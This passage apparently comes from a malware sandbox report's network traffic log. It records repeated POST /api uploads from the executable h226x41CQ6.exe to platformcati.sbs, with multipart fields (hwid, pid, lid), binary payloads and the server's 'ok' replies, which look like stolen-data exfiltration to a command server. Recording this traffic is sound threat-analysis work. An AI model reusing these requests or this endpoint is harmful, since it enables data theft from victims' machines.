                                                                                      2025-01-27 13:54:15 UTC1369INData Raw: 30 50 6e 58 46 69 77 6a 32 79 66 71 73 62 36 65 2b 32 31 68 56 38 2f 63 48 51 57 7a 72 35 38 64 39 34 2f 7a 54 53 42 4a 4d 7a 34 30 43 64 66 43 71 4b 62 37 70 72 36 45 32 6e 79 72 44 4e 48 6e 61 2f 2b 64 5a 52 50 2f 58 6b 6b 6d 4f 6a 4a 35 49 4c 6d 6e 4b 78 43 74 41 7a 59 6f 74 6c 39 54 36 72 63 72 37 4f 39 2f 63 56 65 4c 48 7a 78 52 55 72 73 50 37 66 59 4c 31 74 79 6b 4f 53 65 37 34 46 6e 33 77 6f 67 6e 69 2f 61 75 4e 4e 71 74 65 36 78 68 5a 36 74 2f 37 65 57 7a 44 32 37 70 52 73 74 79 32 54 43 64 38 39 2b 77 65 49 50 58 72 4d 53 62 4a 71 35 6b 7a 72 38 4c 62 4d 47 48 47 70 74 4d 77 62 4c 62 37 67 6b 79 66 70 62 5a 34 4b 6e 33 69 78 42 4a 42 36 4c 34 6c 2b 73 6d 58 6d 52 4b 50 4c 73 73 59 61 66 37 4c 79 30 31 49 77 2b 2f 57 61 62 72 30 68 30 6b 33 66 64
                                                                                      Data Ascii: 0PnXFiwj2yfqsb6e+21hV8/cHQWzr58d94/zTSBJMz40CdfCqKb7pr6E2nyrDNHna/+dZRP/XkkmOjJ5ILmnKxCtAzYotl9T6rcr7O9/cVeLHzxRUrsP7fYL1tykOSe74Fn3wogni/auNNqte6xhZ6t/7eWzD27pRsty2TCd89+weIPXrMSbJq5kzr8LbMGHGptMwbLb7gkyfpbZ4Kn3ixBJB6L4l+smXmRKPLssYaf7Ly01Iw+/Wabr0h0k3fd
                                                                                      2025-01-27 13:54:15 UTC1369INData Raw: 6b 59 6f 74 78 39 54 36 72 53 71 44 58 75 38 77 66 65 37 6e 38 31 46 73 35 39 65 47 55 59 4c 59 72 6e 77 75 53 64 72 67 42 6c 48 63 77 6a 33 61 2f 61 2b 45 44 35 34 57 79 32 6c 59 75 2f 39 50 66 66 43 54 6c 39 59 6b 6e 72 6d 4f 4c 51 35 68 2f 2b 31 6a 51 66 69 32 46 63 72 31 75 35 45 79 74 79 37 50 45 47 33 4f 77 2f 73 46 64 4f 76 50 73 6b 47 79 6a 4c 5a 38 48 6b 33 65 7a 43 35 6f 39 62 4d 78 36 72 53 61 7a 41 35 7a 49 75 73 49 56 59 50 2f 72 6e 55 78 30 2b 65 76 66 50 2f 45 68 6e 41 4f 51 66 37 63 4c 6d 48 77 75 67 6e 71 77 62 2b 4e 4c 75 38 53 78 79 68 64 34 73 50 58 58 55 44 48 36 34 4a 74 68 76 6d 33 63 51 35 68 72 2b 31 6a 51 55 67 57 35 50 35 52 63 71 31 7a 6e 33 50 58 46 47 6a 62 6e 74 4e 39 57 4f 50 62 6f 6d 57 36 39 4a 35 73 49 6b 33 69 2f 44 4a
                                                                                      Data Ascii: kYotx9T6rSqDXu8wfe7n81Fs59eGUYLYrnwuSdrgBlHcwj3a/a+ED54Wy2lYu/9PffCTl9YknrmOLQ5h/+1jQfi2Fcr1u5Eyty7PEG3Ow/sFdOvPskGyjLZ8Hk3ezC5o9bMx6rSazA5zIusIVYP/rnUx0+evfP/EhnAOQf7cLmHwugnqwb+NLu8Sxyhd4sPXXUDH64Jthvm3cQ5hr+1jQUgW5P5Rcq1zn3PXFGjbntN9WOPbomW69J5sIk3i/DJ
                                                                                      2025-01-27 13:54:15 UTC1369INData Raw: 66 4c 52 67 2b 55 53 67 31 37 76 50 47 58 36 33 2f 64 4a 52 4d 66 50 68 6b 32 32 77 4b 70 77 4e 6c 7a 50 31 51 4a 64 6c 59 74 51 39 6c 48 62 77 55 62 2f 49 6c 4d 38 5a 4e 71 43 36 79 68 55 7a 38 71 66 48 4a 37 67 2f 6c 67 36 4e 65 72 77 4f 6e 33 34 77 6a 58 43 2b 64 4f 78 4d 72 63 4b 35 78 42 6c 77 76 76 48 5a 57 54 50 37 37 4a 42 72 38 57 50 53 42 49 63 7a 34 30 43 2b 64 6a 47 62 66 72 74 74 2f 56 6a 70 32 76 76 62 56 6e 47 7a 74 49 73 56 4e 2f 58 73 6d 32 65 39 4c 5a 59 4f 6e 32 47 30 42 35 64 30 4b 5a 35 33 73 6d 48 67 53 36 4c 4b 73 39 41 61 65 4b 33 78 77 55 64 30 73 4b 65 59 66 2f 46 31 30 6a 57 59 59 36 73 44 30 6b 77 30 6a 32 75 2b 61 2b 63 44 74 6f 75 73 67 68 46 36 2f 36 79 54 55 7a 76 33 35 4a 42 6d 75 43 47 66 42 70 5a 32 75 67 61 55 64 79 69
                                                                                      Data Ascii: fLRg+USg17vPGX63/dJRMfPhk22wKpwNlzP1QJdlYtQ9lHbwUb/IlM8ZNqC6yhUz8qfHJ7g/lg6NerwOn34wjXC+dOxMrcK5xBlwvvHZWTP77JBr8WPSBIcz40C+djGbfrtt/Vjp2vvbVnGztIsVN/Xsm2e9LZYOn2G0B5d0KZ53smHgS6LKs9AaeK3xwUd0sKeYf/F10jWYY6sD0kw0j2u+a+cDtousghF6/6yTUzv35JBmuCGfBpZ2ugaUdyi
                                                                                      2025-01-27 13:54:15 UTC1369INData Raw: 76 51 4e 73 49 57 79 7a 6c 59 75 2f 2f 66 55 56 6a 58 30 37 70 4e 6f 74 69 6d 41 43 5a 68 68 75 67 47 62 63 43 36 4d 63 4c 68 73 36 6b 71 6b 79 62 6a 46 45 58 6d 36 74 4a 30 56 4d 2b 61 6e 78 79 65 51 49 4a 6b 50 78 43 6e 37 48 39 35 6b 59 6f 74 78 39 54 36 72 51 36 50 41 76 38 38 56 65 62 7a 6d 30 6c 4d 6d 2f 75 71 56 64 62 73 6d 6c 77 36 53 66 72 67 47 6c 6e 59 75 6e 6e 53 31 5a 65 41 44 35 34 57 79 32 6c 59 75 2f 39 66 45 51 7a 37 35 36 34 6c 73 73 43 36 45 44 6f 38 7a 39 55 43 42 65 6a 50 4d 4a 61 4e 32 2f 45 53 32 69 36 79 43 45 58 72 2f 72 4a 4e 54 50 66 6a 67 6d 57 6d 6a 4b 4a 51 4d 6b 48 71 79 42 4a 68 2b 49 6f 68 35 73 6d 50 6f 54 36 4c 43 74 73 30 53 66 37 48 39 33 42 56 36 76 75 43 48 4a 2b 6c 74 73 78 69 63 66 37 5a 41 6a 7a 4d 37 7a 48 71 35
                                                                                      Data Ascii: vQNsIWyzlYu//fUVjX07pNotimACZhhugGbcC6McLhs6kqkybjFEXm6tJ0VM+anxyeQIJkPxCn7H95kYotx9T6rQ6PAv88Vebzm0lMm/uqVdbsmlw6SfrgGlnYunnS1ZeAD54Wy2lYu/9fEQz7564lssC6EDo8z9UCBejPMJaN2/ES2i6yCEXr/rJNTPfjgmWmjKJQMkHqyBJh+Ioh5smPoT6LCts0Sf7H93BV6vuCHJ+ltsxicf7ZAjzM7zHq5
                                                                                      2025-01-27 13:54:15 UTC1369INData Raw: 6d 64 39 65 49 64 59 4c 72 7a 78 52 63 42 2f 65 6d 52 59 4b 64 74 6a 54 7a 52 4d 37 51 61 30 43 55 62 6c 54 32 79 61 71 73 62 36 64 43 79 77 68 46 73 71 66 50 66 52 44 2f 7a 36 37 31 6f 74 6a 75 52 44 4a 78 69 73 6b 79 62 63 47 4c 43 50 62 4a 2b 71 78 76 70 36 72 4c 55 46 56 6d 38 35 64 6f 56 65 72 37 67 69 53 66 70 62 61 78 44 6a 58 43 72 41 35 39 73 48 4d 77 6c 72 46 69 72 53 4c 2f 43 70 63 45 41 66 62 4c 34 77 6d 74 30 70 72 50 4e 4e 65 4e 2f 77 42 7a 66 62 49 52 4f 30 48 78 69 31 45 53 73 4a 76 30 44 38 5a 66 37 67 67 51 32 35 37 53 55 56 69 62 73 34 5a 78 78 73 6d 71 73 50 62 68 6c 73 51 65 41 65 6a 57 44 50 66 73 6d 35 41 50 78 2f 50 58 4c 45 57 32 75 34 74 35 46 4d 37 37 59 30 53 65 70 62 63 70 44 71 6e 43 31 44 70 64 72 4d 38 46 61 6f 32 7a 73 55
                                                                                      Data Ascii: md9eIdYLrzxRcB/emRYKdtjTzRM7Qa0CUblT2yaqsb6dCywhFsqfPfRD/z671otjuRDJxiskybcGLCPbJ+qxvp6rLUFVm85doVer7giSfpbaxDjXCrA59sHMwlrFirSL/CpcEAfbL4wmt0prPNNeN/wBzfbIRO0Hxi1ESsJv0D8Zf7ggQ257SUVibs4ZxxsmqsPbhlsQeAejWDPfsm5APx/PXLEW2u4t5FM77Y0SepbcpDqnC1DpdrM8Fao2zsU
                                                                                      2025-01-27 13:54:15 UTC1369INData Raw: 43 57 44 61 71 2f 39 39 54 4f 65 75 6f 6a 6e 47 79 4f 35 56 50 6c 32 4b 32 44 4e 42 43 62 4d 78 6c 39 54 36 72 64 71 72 4c 75 38 55 41 5a 2f 4c 55 32 46 6b 33 38 75 61 59 4a 2f 39 74 6c 45 50 48 49 50 56 41 6c 47 78 69 31 43 33 6e 50 62 34 51 2f 70 58 6e 33 56 68 76 2f 2b 4b 54 44 57 61 77 70 34 30 6e 36 57 33 56 41 49 31 68 76 51 4f 47 66 6d 57 79 51 37 52 72 35 41 2b 6e 7a 72 58 46 42 6d 43 6b 75 4e 74 57 4c 75 54 5a 6f 55 79 39 4b 35 55 5a 6d 48 57 64 49 4e 41 7a 59 6f 4d 39 37 56 2b 72 43 2b 6e 36 2b 34 49 4f 4e 75 65 30 35 6c 59 36 38 4f 43 4a 64 76 77 46 73 54 6d 6c 4d 5a 63 48 68 54 38 57 69 32 32 6b 62 65 5a 50 36 59 76 31 78 46 59 75 37 37 71 54 55 53 57 2b 76 38 38 31 36 6e 6a 42 56 4d 38 68 70 45 36 4a 50 54 54 4d 4a 65 63 6f 71 31 48 70 6e 66
                                                                                      Data Ascii: CWDaq/99TOeuojnGyO5VPl2K2DNBCbMxl9T6rdqrLu8UAZ/LU2Fk38uaYJ/9tlEPHIPVAlGxi1C3nPb4Q/pXn3Vhv/+KTDWawp40n6W3VAI1hvQOGfmWyQ7Rr5A+nzrXFBmCkuNtWLuTZoUy9K5UZmHWdINAzYoM97V+rC+n6+4IONue05lY68OCJdvwFsTmlMZcHhT8Wi22kbeZP6Yv1xFYu77qTUSW+v8816njBVM8hpE6JPTTMJecoq1Hpnf
                                                                                      2025-01-27 13:54:15 UTC1369INData Raw: 37 4c 71 54 52 33 53 6d 70 39 68 70 76 43 79 52 44 5a 78 68 71 51 61 54 61 79 48 4c 51 34 74 44 35 6b 36 73 79 37 4c 38 4b 46 65 31 35 4e 35 61 4d 37 7a 48 6d 48 47 79 45 36 77 30 6a 6e 53 72 51 72 5a 2b 4e 49 38 39 2b 79 62 7a 41 2f 47 46 6c 4d 67 47 65 37 44 7a 6b 58 55 7a 36 4f 54 66 4b 66 45 70 30 6c 76 66 56 72 59 4e 6c 58 4d 6c 7a 6c 79 2f 64 75 5a 4d 72 6f 65 56 78 51 42 31 2f 37 71 54 57 58 53 6d 70 35 35 74 6f 53 43 64 42 4e 4e 30 6f 51 66 51 4d 32 4b 43 50 65 30 6d 36 6b 6d 35 79 4c 72 46 57 6e 43 78 2b 70 4e 4b 65 75 65 6e 69 53 66 70 66 74 78 44 6a 54 50 6a 51 4e 64 2b 4d 4a 35 37 74 6e 44 6f 42 4a 66 37 6d 4e 41 52 5a 72 79 32 34 6c 67 77 36 50 4b 63 64 37 59 54 72 43 36 4e 64 4b 73 44 30 6b 77 30 6a 33 32 37 59 61 73 4e 36 64 33 31 6d 6c 5a
                                                                                      Data Ascii: 7LqTR3Smp9hpvCyRDZxhqQaTayHLQ4tD5k6sy7L8KFe15N5aM7zHmHGyE6w0jnSrQrZ+NI89+ybzA/GFlMgGe7DzkXUz6OTfKfEp0lvfVrYNlXMlzly/duZMroeVxQB1/7qTWXSmp55toSCdBNN0oQfQM2KCPe0m6km5yLrFWnCx+pNKeueniSfpftxDjTPjQNd+MJ57tnDoBJf7mNARZry24lgw6PKcd7YTrC6NdKsD0kw0j327YasN6d31mlZ


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.749705104.21.112.14437392C:\Users\user\Desktop\h226x41CQ6.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-27 13:54:16 UTC371OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                      Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/api
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 12839
                                                                                      Host: platformcati.sbs
                                                                                      2025-01-27 13:54:16 UTC12839OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 42 32 35 33 31 42 43 38 39 41 39 34 34 41 33 30 30 35 46 32 30 35 37 44 32 43 37 44 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F5B2531BC89A944A3005F2057D2C7D6C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                      2025-01-27 13:54:39 UTC1124INHTTP/1.1 200 OK
                                                                                      Date: Mon, 27 Jan 2025 13:54:39 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=7451blj4d1bpe1pa5ogpbdcdc6; expires=Fri, 23 May 2025 07:40:56 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bbrRU8%2Bl4K4JvS0a8VMOoCRzLZVR9pPHUR1ERXPzzcdeh6kbVedkvY2SQq6KcBAtavi2x6PT6zbptyfRziGaVc4DfsDDTz1PN97RGdVzZ4lKvwHIJOyl%2BNb87PqFdZoM7GQr"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 90893bd6fbf4729f-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1962&min_rtt=1956&rtt_var=747&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13868&delivery_rate=1452013&cwnd=178&unsent_bytes=0&cid=8cfd452a9dca3487&ts=22734&x=0"
                                                                                      2025-01-27 13:54:39 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2025-01-27 13:54:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.749838104.21.112.14437392C:\Users\user\Desktop\h226x41CQ6.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-27 13:54:40 UTC371OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                      Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/api
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 15071
                                                                                      Host: platformcati.sbs
                                                                                      2025-01-27 13:54:40 UTC15071OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 42 32 35 33 31 42 43 38 39 41 39 34 34 41 33 30 30 35 46 32 30 35 37 44 32 43 37 44 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F5B2531BC89A944A3005F2057D2C7D6C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                      2025-01-27 13:54:40 UTC1129INHTTP/1.1 200 OK
                                                                                      Date: Mon, 27 Jan 2025 13:54:40 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=5mthutthlnnhuu3d9ovkd2c06s; expires=Fri, 23 May 2025 07:41:19 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vHHrig3%2Fnenho3YSBLFlHhSyFIhpjkForgvHK7akld3L%2FByCboWqFjOiL9xg42iYmfurr%2FfBvskTvVTciw3WhSluFCAQKn5mFTgxYzSqzrJCkhd5DVxTgvqliJdHc%2BQMg%2FJq"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 90893c6929540f5b-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1646&rtt_var=724&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2840&recv_bytes=16100&delivery_rate=1773997&cwnd=221&unsent_bytes=0&cid=32d7aabe130006a1&ts=779&x=0"
                                                                                      2025-01-27 13:54:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2025-01-27 13:54:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.749849104.21.112.14437392C:\Users\user\Desktop\h226x41CQ6.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-27 13:54:41 UTC371OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                      Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/api
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 20396
                                                                                      Host: platformcati.sbs
                                                                                      2025-01-27 13:54:41 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 42 32 35 33 31 42 43 38 39 41 39 34 34 41 33 30 30 35 46 32 30 35 37 44 32 43 37 44 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F5B2531BC89A944A3005F2057D2C7D6C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                      2025-01-27 13:54:41 UTC5065OUTData Raw: 00 00 00 00 00 00 b6 b9 fe 28 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc
                                                                                      Data Ascii: (X6K~`iO\_,mi`m?ls}Qm/X2x)
                                                                                      2025-01-27 13:54:42 UTC1121INHTTP/1.1 200 OK
                                                                                      Date: Mon, 27 Jan 2025 13:54:42 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=voggn0gn19us98me8o0kj9hptd; expires=Fri, 23 May 2025 07:41:20 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oHKPWTsNzmlEPpAtNyIcoOFTGrVkXGGOPrUfzThl5eQZq75CksLX127cJJejYLVE0jJYBxnraDgnQ4MJHTOFdIobMp4GMhGx3PjPPCm%2BGvy0Srys3bYiEK91OQJ0h19nnfOp"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 90893c722cdf0f5b-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1651&rtt_var=634&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21447&delivery_rate=1704611&cwnd=221&unsent_bytes=0&cid=60d54dd758a70adf&ts=792&x=0"
                                                                                      2025-01-27 13:54:42 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2025-01-27 13:54:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.749860104.21.112.14437392C:\Users\user\Desktop\h226x41CQ6.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-27 13:54:43 UTC370OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                      Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/api
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 2451
                                                                                      Host: platformcati.sbs
                                                                                      2025-01-27 13:54:43 UTC2451OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 42 32 35 33 31 42 43 38 39 41 39 34 34 41 33 30 30 35 46 32 30 35 37 44 32 43 37 44 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F5B2531BC89A944A3005F2057D2C7D6C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                      2025-01-27 13:54:45 UTC1127INHTTP/1.1 200 OK
                                                                                      Date: Mon, 27 Jan 2025 13:54:44 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=7rpgk8api2faummj8hfv2hnnbp; expires=Fri, 23 May 2025 07:41:23 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CNlO26Y7WMjmBuNVvHhgXsPcUfyh%2FQPMlaPuYVUfUZXyAzq4F%2FJDMZrrGg6ILWpNGPKZGrGYZzN9b%2Ff9gJKhVYHUIeNrD%2BxHe2FG9IZ9%2BZVnM0hVVaheaubVzWBcTIN1pmzt"}],"group":"cf-nel","max_age":604800}
